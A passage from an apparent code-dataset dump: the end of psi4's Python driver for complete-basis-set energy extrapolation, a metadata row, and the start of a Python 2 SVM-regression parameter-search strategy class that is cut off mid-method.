extrapolation to the corl stage. The supplied \alpha does not impact delta or any further stages.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type delta_alpha: float
:param delta_alpha: |dl| ``3.00`` |dr|
Overrides the default \alpha parameter used in the listed
:py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` correlation extrapolation for the delta correction. Useful when
delta correction is performed using smaller basis sets for which a different \alpha might
be more appropriate.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
* Combined interface
:type cbs_metadata: List[Dict]
:param cbs_metadata: |dl| autogenerated from above keywords |dr| || ``[{"wfn": "hf", "basis": "cc-pv[TQ5]z"}]`` || etc.
This is the interface to which all of the above calls are internally translated. The first item in
the array is always defining the SCF contribution to the total energy. The required items in the
dictionary are:
* ```wfn```: typically ```HF```, which is subsumed in correlated methods anyway.
* ```basis```: basis set, can be in a bracketed form (eg. ```cc-pv[tq]z```)
| Other supported arguments for the first dictionary are:
* ```scheme```: scf extrapolation scheme function, by default it is worked out from the number of basis sets (1 - 3) supplied as ```basis```.
* ```alpha```: alpha for the above scheme, if the default is to be overriden
* ```options```: if special options are required for a step, they should be entered as a dict here. If some options should be used for both parts of the stage, they should be entered in both ```options``` and ```options_lo```. This is helpful for calculating all electron corrections in otherwise frozen core calculations, or relativistic (DKH) Hamiltionian corrections for otherwise nonrelativistic.
* ```options_lo```: special options for lower method in a given stage. This is useful to calculate a direct stage in an otherwise density-fitted calculation, or similar.
* ```treatment```: treat extrapolation stage as ```scf``` or ```corl```, by default only the first stage is ```scf``` and every later one is ```corl```.
* ```stage```: tag for the stage used in tables.
| The next items in the ```cbs_metadata``` array extrapolate correlation. All of the above parameters are available, with only the ```wfn``` and ```basis``` keywords required. Other supported parameters are:
* ```wfn_lo```: the lower method from which the delta correction is to be calculated. By default, it is set to ```wfn``` from the previous field in the ```cbs_metadata``` array.
* ```basis_lo```: basis set to be used for the delta correction. By default, it is the same as the ```basis``` specified above.
* Others
:type molecule: :ref:`molecule <op_py_molecule>`
:param molecule: ``h2o`` || etc.
The target molecule, if not the last molecule defined.
:examples:
>>> # [1] replicates with cbs() the simple model chemistry scf/cc-pVDZ: set basis cc-pVDZ energy('scf')
>>> energy(cbs, scf_wfn='scf', scf_basis='cc-pVDZ')
>>> # [2] replicates with cbs() the simple model chemistry mp2/jun-cc-pVDZ: set basis jun-cc-pVDZ energy('mp2')
>>> energy(cbs, corl_wfn='mp2', corl_basis='jun-cc-pVDZ')
>>> # [3] DTQ-zeta extrapolated scf reference energy
>>> energy(cbs, scf_wfn='scf', scf_basis='cc-pV[DTQ]Z', scf_scheme=scf_xtpl_helgaker_3)
>>> # [4] DT-zeta extrapolated mp2 correlation energy atop a T-zeta reference
>>> energy(cbs, corl_wfn='mp2', corl_basis='cc-pv[dt]z', corl_scheme=corl_xtpl_helgaker_2)
>>> # [5] a DT-zeta extrapolated coupled-cluster correction atop a TQ-zeta extrapolated mp2 correlation energy atop a Q-zeta reference (both equivalent)
>>> energy(cbs, corl_wfn='mp2', corl_basis='aug-cc-pv[tq]z', delta_wfn='ccsd(t)', delta_basis='aug-cc-pv[dt]z')
>>> energy(cbs, corl_wfn='mp2', corl_basis='aug-cc-pv[tq]z', corl_scheme=corl_xtpl_helgaker_2, delta_wfn='ccsd(t)', delta_basis='aug-cc-pv[dt]z', delta_scheme=corl_xtpl_helgaker_2)
>>> # [6] a D-zeta ccsd(t) correction atop a DT-zeta extrapolated ccsd cluster correction atop a TQ-zeta extrapolated mp2 correlation energy atop a Q-zeta reference
>>> energy(cbs, corl_wfn='mp2', corl_basis='aug-cc-pv[tq]z', corl_scheme=corl_xtpl_helgaker_2, delta_wfn='ccsd', delta_basis='aug-cc-pv[dt]z', delta_scheme=corl_xtpl_helgaker_2, delta2_wfn='ccsd(t)', delta2_wfn_lesser='ccsd', delta2_basis='aug-cc-pvdz')
>>> # [7] a Q5-zeta MP2 calculation, corrected by CCSD(T) at the TQ-zeta extrapolated level, and all-electron CCSD(T) correlation at T-zeta level
>>> energy(cbs, cbs_metadata=[{"wfn": "hf", "basis": "cc-pv5z"}, {"wfn": "mp2", "basis": "cc-pv[q5]z"}, {"wfn": "ccsd(t)", "basis": "cc-pv[tq]z"}, {"wfn": "ccsd(t)", "basis": "cc-pvtz", "options": {"freeze_core": "False"}}])
>>> # [8] cbs() coupled with database()
>>> TODO database('mp2', 'BASIC', subset=['h2o','nh3'], symm='on', func=cbs, corl_basis='cc-pV[tq]z', corl_scheme=corl_xtpl_helgaker_2, delta_wfn='ccsd(t)', delta_basis='sto-3g')
>>> # [9] cbs() coupled with optimize()
>>> TODO optimize('mp2', corl_basis='cc-pV[DT]Z', corl_scheme=corl_xtpl_helgaker_2, func=cbs)
"""
kwargs = p4util.kwargs_lower(kwargs)
metadata = _process_cbs_kwargs(kwargs)
return_wfn = kwargs.pop('return_wfn', False)
verbose = kwargs.pop('verbose', 0)
ptype = kwargs.pop('ptype')
if ptype not in ['energy', 'gradient', 'hessian']:
raise ValidationError("""Wrapper complete_basis_set is unhappy to be calling
function '%s' instead of 'energy', 'gradient' or 'hessian'.""" % ptype)
optstash = p4util.OptionsState(['BASIS'], ['WFN'], ['WRITER_FILE_LABEL'])
# Define some quantum chemical knowledge, namely what methods are subsumed in others
user_writer_file_label = core.get_global_option('WRITER_FILE_LABEL')
# Make sure the molecule the user provided is the active one
molecule = kwargs.pop('molecule', core.get_active_molecule())
molecule.update_geometry()
natom = molecule.natom()
if metadata[0]["wfn"] not in VARH.keys():
raise ValidationError(
"""Requested SCF method '%s' is not recognized. Add it to VARH in wrapper.py to proceed.""" %
(metadata[0]["wfn"]))
if len(metadata) > 1:
for delta in metadata[1:]:
if delta["wfn"] not in VARH.keys():
raise ValidationError(
"""Requested higher %s method '%s' is not recognized. Add it to VARH in wrapper.py to proceed.""" %
(delta["treatment"], delta["wfn"]))
if delta["wfn_lo"] not in VARH.keys():
raise ValidationError(
"""Requested lesser %s method '%s' is not recognized. Add it to VARH in wrapper.py to proceed.""" %
(delta["treatment"], delta["wfn_lo"]))
# Build string of title banner
instructions = "\n" + p4util.banner(f" CBS Setup{':' + label if label else ''} ", strNotOutfile=True) + "\n"
core.print_out(instructions)
# Call schemes for each portion of total energy to 'place orders' for calculations needed
d_fields = [
'd_stage', 'd_scheme', 'd_basis', 'd_wfn', 'd_need', 'd_coef', 'd_energy', 'd_gradient', 'd_hessian', 'd_alpha'
]
f_fields = ['f_wfn', 'f_basis', 'f_zeta', 'f_energy', 'f_gradient', 'f_hessian', 'f_options']
GRAND_NEED = []
MODELCHEM = []
NEED = _expand_scheme_orders(metadata[0]["scheme"], metadata[0]["basis"][0], metadata[0]["basis"][1],
metadata[0]["wfn"], metadata[0]["options"], natom)
GRAND_NEED.append(
dict(
zip(d_fields, [
'scf', metadata[0]["scheme"],
_contract_bracketed_basis(metadata[0]["basis"][0]), metadata[0]["wfn"], NEED, +1, 0.0, None, None,
metadata[0]["alpha"]
])))
if len(metadata) > 1:
for delta in metadata[1:]:
NEED = _expand_scheme_orders(delta["scheme"], delta["basis"][0], delta["basis"][1], delta["wfn"],
delta["options"], natom)
GRAND_NEED.append(
dict(
zip(d_fields, [
delta["stage"], delta["scheme"],
_contract_bracketed_basis(delta["basis"][0]), delta["wfn"], NEED, +1, 0.0, None, None,
delta["alpha"]
])))
NEED = _expand_scheme_orders(delta["scheme"], delta["basis_lo"][0], delta["basis_lo"][1], delta["wfn_lo"],
delta["options_lo"], natom)
GRAND_NEED.append(
dict(
zip(d_fields, [
delta["stage"], delta["scheme"],
_contract_bracketed_basis(delta["basis_lo"][0]), delta["wfn_lo"], NEED, -1, 0.0, None, None,
delta["alpha"]
])))
for stage in GRAND_NEED:
for lvl in stage['d_need'].items():
MODELCHEM.append(lvl[1])
# Apply chemical reasoning to choose the minimum computations to run
JOBS = MODELCHEM[:]
addlremark = {'energy': '', 'gradient': ', GRADIENT', 'hessian': ', HESSIAN'}
instructions = ''
instructions += """ Naive listing of computations required.\n"""
for mc in JOBS:
instructions += """ %12s / %-24s for %s%s\n""" % \
(mc['f_wfn'], mc['f_basis'] + " + options"*bool(mc['f_options']),
VARH[mc['f_wfn']][mc['f_wfn']], addlremark[ptype])
# Remove duplicate modelchem portion listings
for mc in MODELCHEM:
dups = -1
for indx_job, job in enumerate(JOBS):
if (job['f_wfn'] == mc['f_wfn']) and (job['f_basis'] == mc['f_basis']) and \
(job['f_options'] == mc['f_options']):
dups += 1
if dups >= 1:
del JOBS[indx_job]
# Remove chemically subsumed modelchem portion listings
if ptype == 'energy':
for mc in MODELCHEM:
for wfn in VARH[mc['f_wfn']]:
for indx_job, job in enumerate(JOBS):
if (VARH[mc['f_wfn']][wfn] == VARH[job['f_wfn']][job['f_wfn']]) and \
(mc['f_basis'] == job['f_basis']) and not \
(mc['f_wfn'] == job['f_wfn']) and \
(mc['f_options'] == False):
del JOBS[indx_job]
instructions += """\n Enlightened listing of computations required.\n"""
for mc in JOBS:
instructions += """ %12s / %-24s for %s%s\n""" % \
(mc['f_wfn'], mc['f_basis'] + " + options"*bool(mc['f_options']),
VARH[mc['f_wfn']][mc['f_wfn']], addlremark[ptype])
# Expand listings to all that will be obtained
JOBS_EXT = []
for job in JOBS:
for wfn in VARH[job['f_wfn']]:
JOBS_EXT.append(
dict(
zip(f_fields, [
wfn, job['f_basis'], job['f_zeta'], 0.0,
core.Matrix(natom, 3),
core.Matrix(3 * natom, 3 * natom), job['f_options']
])))
instructions += """\n Full listing of computations to be obtained (required and bonus).\n"""
for mc in JOBS_EXT:
instructions += """ %12s / %-24s for %s%s\n""" % \
(mc['f_wfn'], mc['f_basis'] + " + options"*bool(mc['f_options']),
VARH[mc['f_wfn']][mc['f_wfn']], addlremark[ptype])
core.print_out(instructions)
psioh = core.IOManager.shared_object()
psioh.set_specific_retention(psif.PSIF_SCF_MOS, True)
# projection across point groups not allowed and cbs() usually a mix of symm-enabled and symm-tol calls
# needs to be communicated to optimize() so reset by that optstash
core.set_local_option('SCF', 'GUESS_PERSIST', True)
Njobs = 0
# Run necessary computations
for mc in JOBS:
kwargs['name'] = mc['f_wfn']
# Build string of title banner
cbsbanners = ''
cbsbanners += """core.print_out('\\n')\n"""
cbsbanners += """p4util.banner(' CBS Computation: %s / %s%s ')\n""" % \
(mc['f_wfn'].upper(), mc['f_basis'].upper() + " + opts."*bool(mc['f_options']), addlremark[ptype])
cbsbanners += """core.print_out('\\n')\n\n"""
exec(cbsbanners)
# Build string of molecule and commands that are dependent on the database
commands = '\n'
commands += """\ncore.set_global_option('BASIS', '%s')\n""" % (mc['f_basis'])
commands += """core.set_global_option('WRITER_FILE_LABEL', '%s')\n""" % \
(user_writer_file_label + ('' if user_writer_file_label == '' else '-') + mc['f_wfn'].lower() + '-' + mc['f_basis'].lower().replace('*', 's'))
exec(commands)
# Stash and set options if any
if mc["f_options"]:
optionstash = p4util.OptionsState(*[[opt] for opt in list(mc["f_options"])])
for k, v, in mc["f_options"].items():
core.set_global_option(k.upper(), v)
else:
optionstash = False
# Make energy(), etc. call
response = func(molecule=molecule, **kwargs)
if ptype == 'energy':
mc['f_energy'] = response
elif ptype == 'gradient':
mc['f_gradient'] = response
mc['f_energy'] = core.variable('CURRENT ENERGY')
if verbose > 1:
mc['f_gradient'].print_out()
elif ptype == 'hessian':
mc['f_hessian'] = response
mc['f_energy'] = core.variable('CURRENT ENERGY')
if verbose > 1:
mc['f_hessian'].print_out()
Njobs += 1
if verbose > 1:
core.print_out("\nCURRENT ENERGY: %14.16f\n" % mc['f_energy'])
# Restore modified options
if optionstash:
optionstash.restore()
# Fill in energies for subsumed methods
if ptype == 'energy':
for wfn in VARH[mc['f_wfn']]:
for job in JOBS_EXT:
if (wfn == job['f_wfn']) and (mc['f_basis'] == job['f_basis']) and \
(mc['f_options'] == job['f_options']):
job['f_energy'] = core.variable(VARH[wfn][wfn])
if verbose > 1:
core.print_variables()
core.clean_variables()
core.clean()
# Copy data from 'run' to 'obtained' table
for mce in JOBS_EXT:
if (mc['f_wfn'] == mce['f_wfn']) and (mc['f_basis'] == mce['f_basis']) and \
(mc['f_options'] == mce['f_options']):
mce['f_energy'] = mc['f_energy']
mce['f_gradient'] = mc['f_gradient']
mce['f_hessian'] = mc['f_hessian']
psioh.set_specific_retention(psif.PSIF_SCF_MOS, False)
# Build string of title banner
instructions = "\n" + p4util.banner(f" CBS Results{':' + label if label else ''} ", strNotOutfile=True) + "\n"
core.print_out(instructions)
# Insert obtained energies into the array that stores the cbs stages
for stage in GRAND_NEED:
for lvl in stage['d_need'].items():
MODELCHEM.append(lvl[1])
for job in JOBS_EXT:
# Dont ask
if (((lvl[1]['f_wfn'] == job['f_wfn']) or
((lvl[1]['f_wfn'][3:] == job['f_wfn']) and lvl[1]['f_wfn'].startswith('c4-')) or
((lvl[1]['f_wfn'] == job['f_wfn'][3:]) and job['f_wfn'].startswith('c4-')) or
(('c4-' + lvl[1]['f_wfn']) == job['f_wfn']) or (lvl[1]['f_wfn'] == ('c4-' + job['f_wfn'])))
and (lvl[1]['f_basis'] == job['f_basis']) and (lvl[1]['f_options'] == job['f_options'])):
lvl[1]['f_energy'] = job['f_energy']
lvl[1]['f_gradient'] = job['f_gradient']
lvl[1]['f_hessian'] = job['f_hessian']
# Make xtpl() call
finalenergy = 0.0
finalgradient = core.Matrix(natom, 3)
finalhessian = core.Matrix(3 * natom, 3 * natom)
for stage in GRAND_NEED:
hiloargs = {'alpha': stage['d_alpha']}
hiloargs.update(_contract_scheme_orders(stage['d_need'], 'f_energy'))
stage['d_energy'] = stage['d_scheme'](**hiloargs)
finalenergy += stage['d_energy'] * stage['d_coef']
if ptype == 'gradient':
hiloargs.update(_contract_scheme_orders(stage['d_need'], 'f_gradient'))
stage['d_gradient'] = stage['d_scheme'](**hiloargs)
work = stage['d_gradient'].clone()
work.scale(stage['d_coef'])
finalgradient.add(work)
elif ptype == 'hessian':
hiloargs.update(_contract_scheme_orders(stage['d_need'], 'f_hessian'))
stage['d_hessian'] = stage['d_scheme'](**hiloargs)
work = stage['d_hessian'].clone()
work.scale(stage['d_coef'])
finalhessian.add(work)
# Build string of results table
table_delimit = ' ' + '-' * 105 + '\n'
tables = ''
tables += """\n ==> %s <==\n\n""" % ('Components')
tables += table_delimit
tables += """ %6s %20s %1s %-26s %3s %16s %-s\n""" % ('', 'Method', '/', 'Basis', 'Rqd', 'Energy [Eh]',
'Variable')
tables += table_delimit
for job in JOBS_EXT:
star = ''
for mc in MODELCHEM:
if (job['f_wfn'] == mc['f_wfn']) and (job['f_basis'] == mc['f_basis']):
star = '*'
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
'', job['f_wfn'], '/', job['f_basis'] + " + options" * bool(job['f_options']), star, job['f_energy'],
VARH[job['f_wfn']][job['f_wfn']])
tables += table_delimit
tables += """\n ==> %s <==\n\n""" % ('Stages')
tables += table_delimit
tables += """ %6s %20s %1s %-27s %2s %16s %-s\n""" % ('Stage', 'Method', '/', 'Basis', 'Wt', 'Energy [Eh]',
'Scheme')
tables += table_delimit
for stage in GRAND_NEED:
tables += """ %6s %20s %1s %-27s %2d %16.8f %-s\n""" % (stage['d_stage'], stage['d_wfn'], '/',
stage['d_basis'], stage['d_coef'],
stage['d_energy'], stage['d_scheme'].__name__)
tables += table_delimit
tables += """\n ==> %s <==\n\n""" % ('CBS')
tables += table_delimit
tables += """ %6s %20s %1s %-27s %2s %16s %-s\n""" % ('Stage', 'Method', '/', 'Basis', '', 'Energy [Eh]',
'Scheme')
tables += table_delimit
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
GRAND_NEED[0]['d_stage'], GRAND_NEED[0]['d_wfn'], '/', GRAND_NEED[0]['d_basis'], '', GRAND_NEED[0]['d_energy'],
GRAND_NEED[0]['d_scheme'].__name__)
if len(metadata) > 1:
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
GRAND_NEED[1]['d_stage'], GRAND_NEED[1]['d_wfn'], '/', GRAND_NEED[1]['d_basis'], '',
GRAND_NEED[1]['d_energy'] - GRAND_NEED[2]['d_energy'], GRAND_NEED[1]['d_scheme'].__name__)
if len(metadata) > 2:
dc = 3
for delta in metadata[2:]:
deltaE_total = GRAND_NEED[dc]['d_energy'] - GRAND_NEED[dc + 1]['d_energy']
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
GRAND_NEED[dc]['d_stage'], GRAND_NEED[dc]['d_wfn'] + ' - ' + GRAND_NEED[dc + 1]['d_wfn'], '/',
GRAND_NEED[dc]['d_basis'], '', deltaE_total,
GRAND_NEED[dc]['d_scheme'].__name__)
core.set_variable(f"CBS {GRAND_NEED[dc]['d_stage'].upper()} TOTAL ENERGY", deltaE_total)
dc += 2
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % ('total', 'CBS', '', '', '', finalenergy, '')
tables += table_delimit
core.print_out(tables)
core.set_variable('CBS REFERENCE ENERGY', GRAND_NEED[0]['d_energy'])
core.set_variable('CBS CORRELATION ENERGY', finalenergy - GRAND_NEED[0]['d_energy'])
core.set_variable('CBS TOTAL ENERGY', finalenergy)
core.set_variable('CURRENT REFERENCE ENERGY', GRAND_NEED[0]['d_energy'])
core.set_variable('CURRENT CORRELATION ENERGY', finalenergy - GRAND_NEED[0]['d_energy'])
core.set_variable('CURRENT ENERGY', finalenergy)
core.set_variable('CBS NUMBER', Njobs)
# new skeleton wavefunction w/mol, highest-SCF basis (just to choose one), & not energy
basis = core.BasisSet.build(molecule, "ORBITAL", 'def2-svp')
wfn = core.Wavefunction(molecule, basis)
optstash.restore()
if ptype == 'energy':
finalquantity = finalenergy
elif ptype == 'gradient':
finalquantity = finalgradient
wfn.set_gradient(finalquantity)
if finalquantity.rows(0) < 20:
core.print_out('CURRENT GRADIENT')
finalquantity.print_out()
elif ptype == 'hessian':
finalquantity = finalhessian
wfn.set_gradient(finalgradient)
wfn.set_hessian(finalquantity)
if finalquantity.rows(0) < 20:
core.print_out('CURRENT HESSIAN')
finalquantity.print_out()
if return_wfn:
return (finalquantity, wfn)
else:
return finalquantity
######### COMPUTE / ASSEMBLE
######### ASSEMBLE / REPORT
def _expand_scheme_orders(scheme, basisname, basiszeta, wfnname, options, natom):
"""Check that the length of *basiszeta* array matches the implied degree of
extrapolation in *scheme* name. Return a dictionary of same length as
basiszeta, with *basisname* and *basiszeta* distributed therein.
"""
Nxtpl = len(basiszeta)
if int(scheme.__name__.split('_')[-1]) != Nxtpl:
raise ValidationError("""Call to '%s' not valid with '%s' basis sets.""" % (scheme.__name__, len(basiszeta)))
f_fields = ['f_wfn', 'f_basis', 'f_zeta', 'f_energy', 'f_gradient', 'f_hessian', 'f_options']
NEED = {}
for idx in range(Nxtpl):
NEED[_lmh_labels[Nxtpl][idx]] = dict(
zip(f_fields, [
wfnname, basisname[idx], basiszeta[idx], 0.0,
core.Matrix(natom, 3),
core.Matrix(3 * natom, 3 * natom), options
]))
return NEED
def _contract_scheme_orders(needdict, datakey='f_energy'):
"""Prepared named arguments for extrapolation functions by
extracting zetas and values (which one determined by *datakey*) out
of *needdict* and returning a dictionary whose keys are constructed
from _lmh_labels.
"""
largs = {}
largs['functionname'] = needdict['HI']['f_wfn']
Nxtpl = len(needdict)
zlabels = _lmh_labels[Nxtpl] # e.g., ['LO', 'HI']
for zeta in range(Nxtpl):
zlab = zlabels[zeta] # e.g., LO
largs['z' + zlab] = needdict[zlab]['f_zeta']
largs['value' + zlab] = needdict[zlab][datakey]
return largs
## Aliases ##
complete_basis_set = cbs
def _cbs_wrapper_methods(**kwargs):
""" A helper function for the driver to enumerate methods used in the
stages of a cbs calculation.
Parameters
----------
kwargs : dict
kwargs containing cbs specification either in the ``cbs_metadata``
format, or in separate keywords (``scf_wfn``, ``corl_wfn`` etc.).
Returns
-------
list
List containing method name for each active stage.
"""
cbs_methods = []
if "cbs_metadata" in kwargs:
for item in kwargs["cbs_metadata"]:
cbs_methods.append(item.get("wfn"))
else:
cbs_method_kwargs = ['scf_wfn', 'corl_wfn', 'delta_wfn']
cbs_method_kwargs += [f'delta{x}_wfn' for x in range(2, 6)]
for method in cbs_method_kwargs:
if method in kwargs:
cbs_methods.append(kwargs[method])
return cbs_methods
def _parse_cbs_gufunc_string(method_name):
""" A helper function that parses a ``"method/basis"`` input string
into separate method and basis components. Also handles delta corrections.
Parameters
----------
method_name : str
A ``"method/basis"`` style string defining the calculation.
Returns
-------
tuple
Tuple in the ``(method_list, basis_list)`` format, where ``method_list``
is the list of the component methods, and ``basis_list`` is the list of
basis sets forming the extrapolation for each specified method.
E.g. ``"mp2/cc-pv[tq]z+D:ccsd(t)/cc-pvtz"`` would return:
``(["mp2", "ccsd(t)"], ["cc-pv[tq]z", "cc-pvtz"])``.
"""
method_name_list = re.split(r"""\+(?=\s*[Dd]:)""", method_name)
if len(method_name_list) > 2:
raise ValidationError(
"CBS gufunc: Text parsing is only valid for a single delta, please use the CBS wrapper directly")
method_list = []
basis_list = []
for num, method_str in enumerate(method_name_list):
if (method_str.count("[") > 1) or (method_str.count("]") > 1):
raise ValidationError(f"""CBS gufunc: Too many brackets given! {method_str}""")
if method_str.count('/') != 1:
raise ValidationError(f"""CBS gufunc: All methods must specify a basis with '/'. {method_str}""")
if num > 0:
method_str = method_str.strip()
if method_str[:2].lower() != 'd:':
raise ValidationError("""CBS gufunc: Delta method must start with 'D:'.""")
else:
method_str = method_str[2:]
method, basis = method_str.split('/')
method_list.append(method)
basis_list.append(basis)
return method_list, basis_list
def _cbs_gufunc(func, total_method_name, **kwargs):
"""
A text based parser of the CBS method string. Provided to handle "method/basis"
specification of the requested calculations. Also handles "simple" (i.e.
one-method and one-basis) calls.
Parameters
----------
func : function
Function to be called (energy, gradient, frequency or cbs).
total_method_name : str
String in a ``"method/basis"`` syntax. Simple calls (e.g. ``"blyp/sto-3g"``) are
bounced out of CBS. More complex calls (e.g. ``"mp2/cc-pv[tq]z"`` or
``"mp2/cc-pv[tq]z+D:ccsd(t)/cc-pvtz"``) are expanded by `_parse_cbs_gufunc_string()`
and pushed through :py:func:`~psi4.cbs`.
Returns
-------
tuple or float
Float, or if ``return_wfn`` is specified, a tuple of ``(value, wavefunction)``.
"""
# Catch kwarg issues for all methods
kwargs = p4util.kwargs_lower(kwargs)
return_wfn = kwargs.pop('return_wfn', False)
core.clean_variables()
ptype = kwargs.pop('ptype', None)
# Make sure the molecule the user provided is the active one
molecule = kwargs.pop('molecule', core.get_active_molecule())
molecule.update_geometry()
# Sanitize total_method_name
label = total_method_name
total_method_name = total_method_name.lower()
total_method_name = total_method_name.replace(' ', '')
# Split into components
method_list, basis_list = _parse_cbs_gufunc_string(total_method_name)
# Single energy call?
single_call = len(method_list) == 1
single_call &= '[' not in basis_list[0]
single_call &= ']' not in basis_list[0]
if single_call:
method_name = method_list[0]
basis = basis_list[0]
# Save some global variables so we can reset them later
optstash = p4util.OptionsState(['BASIS'])
core.set_global_option('BASIS', basis)
ptype_value, wfn = func(method_name, return_wfn=True, molecule=molecule, **kwargs)
if core.get_option("SCF", "DF_INTS_IO") != "SAVE":
core.clean()
optstash.restore()
if return_wfn:
return (ptype_value, wfn)
else:
return ptype_value
# Drop out for unsupported calls
if ptype not in ["energy", "gradient", "hessian"]:
raise ValidationError("%s: Cannot extrapolate or delta correct %s yet." % (ptype.title(), ptype))
# Catch kwarg issues for CBS methods only
user_dertype = kwargs.pop('dertype', None)
cbs_verbose = kwargs.pop('cbs_verbose', False)
# If we are not a single call, let CBS wrapper handle it!
cbs_kwargs = {}
cbs_kwargs['ptype'] = ptype
cbs_kwargs['return_wfn'] = True
cbs_kwargs['molecule'] = molecule
cbs_kwargs['verbose'] = cbs_verbose
if user_dertype != None:
cbs_kwargs['dertype'] = user_dertype
# Find method and basis
metadata = []
if method_list[0] in ['scf', 'hf', 'c4-scf', 'c4-hf']:
stage = {}
stage['wfn'] = method_list[0]
stage['basis'] = basis_list[0]
if 'scf_scheme' in kwargs:
stage['scheme'] = kwargs.pop('scf_scheme')
stage['stage'] = "scf"
stage['treatment'] = "scf"
else:
# _validate_cbs_inputs will produce scf stage automatically
stage = {}
stage['wfn'] = method_list[0]
stage['basis'] = basis_list[0]
if 'corl_scheme' in kwargs:
stage['scheme'] = kwargs.pop('corl_scheme')
stage['stage'] = "corl"
stage['treatment'] = "corl"
metadata.append(stage)
# "method/basis" syntax only allows for one delta correction
# via "method/basis+D:delta/basis". Maximum length of method_list is 2.
if len(method_list) == 2:
stage = {}
stage['wfn'] = method_list[1]
stage['basis'] = basis_list[1]
if 'delta_scheme' in kwargs:
stage['scheme'] = kwargs.pop('delta_scheme')
stage['stage'] = "delta1"
stage['treatment'] = "corl"
metadata.append(stage)
cbs_kwargs["cbs_metadata"] = metadata
ptype_value, wfn = cbs(func, label, **cbs_kwargs)
if return_wfn:
return (ptype_value, wfn)
else:
return ptype_value
|
lothian/psi4
|
psi4/driver/driver_cbs.py
|
Python
|
lgpl-3.0
| 83,107
|
[
"CFOUR",
"Psi4"
] |
b8b84f1d4784e82177e8e9bb40a67be1e7671b38d73d91026ec94b9841e7379d
|
#! /usr/bin/env python
#import math, pdb, sys
#from numpy import *
#from numpy.linalg import *
#import random
#from copy import copy
from random import choice
from numpy import array, random, ones, zeros, sin, vstack, hstack, argmax, diag, linalg, dot, exp
#from sg import sg # Import shogun
import string, os
import pickle
import pdb
from Strategy import Strategy, OneStepStrategy
from util import *
from SineModel import SineModel5
# NOT USING THIS ANY MORE
#
# '''
# A strategy that uses the Support Vector Machine regression to
# guess which parameter vector would be good to try next. Requires
# the installation of "pysvmlight", an interface to SVM Light by
# Thorsten Joachims (http://svmlight.joachims.org/). pysvmlight is
# available here:
#
# http://bitbucket.org/wcauchois/pysvmlight
# '''
class SVMLearningStrategy(OneStepStrategy):
'''
A strategy that uses the Support Vector Machine regression to
guess which parameter vector would be good to try next. Requires
the installation of shogun-python, a python machine learning
library offering, among other things, access to libsvr.
http://www.shogun-toolbox.org/
http://www.csie.ntu.edu.tw/~cjlin/libsvm/
'''
def __init__(self, *args, **kwargs):
# call this only after popping 'ranges' arg
super(SVMLearningStrategy, self).__init__(*args, **kwargs)
self.pickle = True
if 'pickle' in kwargs:
self.pickle = kwargs['pickle']
if self.pickle:
self.randStr = ''.join(choice(string.ascii_letters) for ii in range(6))
filename = 'svmstate_%s_000.pkl' % (self.randStr)
print 'SVMLearningStrategy saving itself as files like', filename
########################
# Strategy parameters
########################
# Number of points to add to the initial point to try before learning
N_init_neighborhood = 7
# Initial noise to add to the inital point to generate the
# N_init_neighborhood points
initialNoise = .1
# How close to search around the best point, in terms of a
# fraction of the range in each dimension
self.exploreScale = .01
# How many nearby points to check
self.numNearby = 100
# How much random noise to add to the next trial (might
# prevent model collapse)
self.bumpBy = .01
# If the best predicted distance is below this, the bump by
# self.lowDistBump instead of self.bumpBy
self.lowDistThresh = 5.0
# How much random noise to add to the next trial if we're getting nowhere
self.lowDistBump = .1
# Only use the last trainOnLast runs for training, instead of
# training on all data.
self.trainOnLast = 6
########################
# SVR parameters
########################
self.width = 2.1
#self.width = .1
#self.width = .03
#self.C=1.2
#self.C=.5 # tried this a few times, repetitive runs
#self.C=.04
self.C=500. # barely gets training on 8 perfect
self.C=1000. # maybe try this?
# SVR termination criteria
self.tube_epsilon=1e-3
# self.current is defined in Strategy constructor
# Populate toTry with some points
self.toTry = array(self.current)
for ii in range(N_init_neighborhood):
#row = randUniformPoint(self.ranges)
row = randGaussianPoint(self.current, self.ranges, initialNoise)
self.toTry = vstack((self.toTry, row))
self.X = None
self.y = None
def _getNext(self):
'''Get the next point to try. The first few times this will
return a random point near the initialPoint, and after that it
will return the best predicted point by the learning model,
perhaps with some added noise.'''
if self.toTry.shape[0] == 0:
# We're out of things to try. Make more.
# 1. Learn
self.train()
# 2. Try some nearby values
for ii in xrange(self.numNearby):
row = array(randGaussianPoint(self.bestState, self.ranges, self.exploreScale))
if ii == 0:
nearbyPoints = row
else:
nearbyPoints = vstack((nearbyPoints, row))
predictions = self.predict(nearbyPoints)
#print 'nearbyPoints', nearbyPoints
#print 'predicitons', predictions
# 3. Pick best one
iiMax = argmax(predictions)
self.toTry = array([nearbyPoints[iiMax, :]])
# Testing hack... this should be disabled
#self.toTry = array([randUniformPoint(self.ranges)])
# Prints the most promising vector found and its predicted value
print ' value for best', prettyVec(self.bestState),
print 'p: %.2f, a: %.2f' % (self.predict(self.bestState),
self.bestDist)
print ' most promising', prettyVec(self.toTry[0,:]), 'pred: %.2f' % predictions[iiMax]
# 4. (optional) Add a little noise (or a lot of noise)
if predictions[iiMax] < self.lowDistThresh:
extraStr = '+'
bumpBy = self.lowDistBump
else:
extraStr = ' '
bumpBy = self.bumpBy
bump = randGaussianPoint(zeros(self.toTry.shape[1]),
self.ranges, bumpBy, crop=False)
self.toTry += bump
print ' %snoisy promising' % extraStr, prettyVec(self.toTry[0,:]),
print 'pred: %.2f' % self.predict(self.toTry[0,:])
self.current = self.toTry[0,:]
return self.current
def updateResults(self, dist):
'''This must be called for the last point that was handed out!
Once called, we remove the first point from self.toTry and add
it to self.X and add the distance to self.y
'''
# MAKE SURE TO CALL super().updateResults!
super(SVMLearningStrategy, self).updateResults(dist)
dist = float(dist)
justTried = self.toTry[0,:]
self.toTry = self.toTry[1:,:]
if self.X == None:
self.X = justTried
self.y = array(dist)
else:
self.X = vstack((self.X, justTried))
self.y = hstack((self.y, array(dist)))
if self.pickle:
self.saveAndCleanup()
def train(self):
'''Learn a model from self.X and self.y'''
# Constants pulled from <shogun>/examples/documented/python/regression_libsvr.py
